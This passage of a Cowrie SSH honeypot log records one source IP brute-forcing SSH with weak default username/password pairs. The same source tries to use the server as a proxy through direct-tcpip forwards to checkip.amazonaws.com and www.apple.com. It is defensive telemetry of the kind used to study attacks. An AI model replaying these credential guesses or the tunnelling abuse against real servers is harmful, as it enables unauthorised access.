\\xf59\\xdc\\xb1tW\\x11\\x07'uiWb\\x17\\xb6\\xe8\\xce\\x13K\\xb3tsp\\xbe\\xa7&\\xaa\\x94-j\\x1cv\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xcd\\xa1\\xae\\xd2\\xd5\\xe7\\x8a[\\xf4\\xfdODP\\xc2+\\x04\\x01\\x17\\xc5\\xad\\x0c\\xf1\\xd6\\xcf\\xe9J\\x9b{\\xab\\x1a}{\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 54.228.208.160:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03c\\xc1\\x84\\x15\\xaa\\xec\\xd3b\\xdey\\xfb\\x91\\xaa_\\xf7\\xa9\\xb7A\\xc5\\xe1\\xe5(@_\\xfe\\x9eN\\x0f\\r\\xce\\xa1G \\xf59\\xdc\\xb1tW\\x11\\x07'uiWb\\x17\\xb6\\xe8\\xce\\x13K\\xb3tsp\\xbe\\xa7&\\xaa\\x94-j\\x1cv\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xcd\\xa1\\xae\\xd2\\xd5\\xe7\\x8a[\\xf4\\xfdODP\\xc2+\\x04\\x01\\x17\\xc5\\xad\\x0c\\xf1\\xd6\\xcf\\xe9J\\x9b{\\xab\\x1a}{\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T21:11:35.954538Z","src_ip":"212.227.235.229","session":"d585cace115e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41280,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c8deae23dc5","protocol":"ssh","message":"New connection: 212.227.235.229:41280 (1.2.3.4:22) [session: 4c8deae23dc5]","sensor":"my-vps","timestamp":"2025-08-26T21:11:36.296809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:11:36.298028Z","src_ip":"212.227.235.229","session":"4c8deae23dc5"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:11:36.557149Z","src_ip":"212.227.235.229","session":"4c8deae23dc5"}
{"eventid":"cowrie.login.failed","username":"newadmin","password":"newadmin","message":"login attempt [newadmin/newadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:11:37.975844Z","src_ip":"212.227.235.229","session":"4c8deae23dc5"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:11:39.857465Z","src_ip":"212.227.235.229","session":"4c8deae23dc5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.62.220.197","dst_port":443,"src_ip":"212.227.235.229","src_port":41550,"message":"direct-tcp connection request to 23.62.220.197:443 from 127.0.0.1:41550","sensor":"my-vps","timestamp":"2025-08-26T21:11:40.401573Z","session":"d585cace115e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.62.220.197","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xb4\\xac\\x0c\\x0eI^~\\xc2\\xe0`'\\xb8\\xdd9t\\x10\\x08e\\x8bX/\\x9dz\\xfa?\\xe3\\x1a3\\xb5\\xb0\\x8c\\xb7 ]Wr\\xdf\\x84\\x97\\x9f_J\\xd0\\xd5I1\\xae.`\\x02uh=,\\xad8\\xc9\\x0bJT)\\xb6\\x0c{b\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x11\\xff[\\xc6\\xd1\\x82G\\x9a\\x94\\xce6\\xefh\\xc9\\xc2\\xe1\\xbe\\x8f\\x1e\\xe2\\xa0\\xfe\\xe4C\\xb3\\xd1p\\xae\\x82]@P\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 23.62.220.197:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xb4\\xac\\x0c\\x0eI^~\\xc2\\xe0`'\\xb8\\xdd9t\\x10\\x08e\\x8bX/\\x9dz\\xfa?\\xe3\\x1a3\\xb5\\xb0\\x8c\\xb7 ]Wr\\xdf\\x84\\x97\\x9f_J\\xd0\\xd5I1\\xae.`\\x02uh=,\\xad8\\xc9\\x0bJT)\\xb6\\x0c{b\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x11\\xff[\\xc6\\xd1\\x82G\\x9a\\x94\\xce6\\xefh\\xc9\\xc2\\xe1\\xbe\\x8f\\x1e\\xe2\\xa0\\xfe\\xe4C\\xb3\\xd1p\\xae\\x82]@P\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T21:11:43.860832Z","src_ip":"212.227.235.229","session":"d585cace115e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59254,"dst_ip":"1.2.3.4","dst_port":22,"session":"09fd32e168cb","protocol":"ssh","message":"New connection: 212.227.235.229:59254 (1.2.3.4:22) [session: 09fd32e168cb]","sensor":"my-vps","timestamp":"2025-08-26T21:11:45.933429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:11:45.940980Z","src_ip":"212.227.235.229","session":"09fd32e168cb"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:11:46.223833Z","src_ip":"212.227.235.229","session":"09fd32e168cb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qwertyuiop","message":"login attempt [admin/qwertyuiop] failed","sensor":"my-vps","timestamp":"2025-08-26T21:11:47.606829Z","src_ip":"212.227.235.229","session":"09fd32e168cb"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:11:48.859901Z","src_ip":"212.227.235.229","session":"09fd32e168cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44514,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ec2110c3e8a","protocol":"ssh","message":"New connection: 212.227.235.229:44514 (1.2.3.4:22) [session: 7ec2110c3e8a]","sensor":"my-vps","timestamp":"2025-08-26T21:11:50.057112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:11:50.098420Z","src_ip":"212.227.235.229","session":"7ec2110c3e8a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:11:50.388541Z","src_ip":"212.227.235.229","session":"7ec2110c3e8a"}
{"eventid":"cowrie.login.failed","username":"admian","password":"admin","message":"login attempt [admian/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:11:52.258031Z","src_ip":"212.227.235.229","session":"7ec2110c3e8a"}
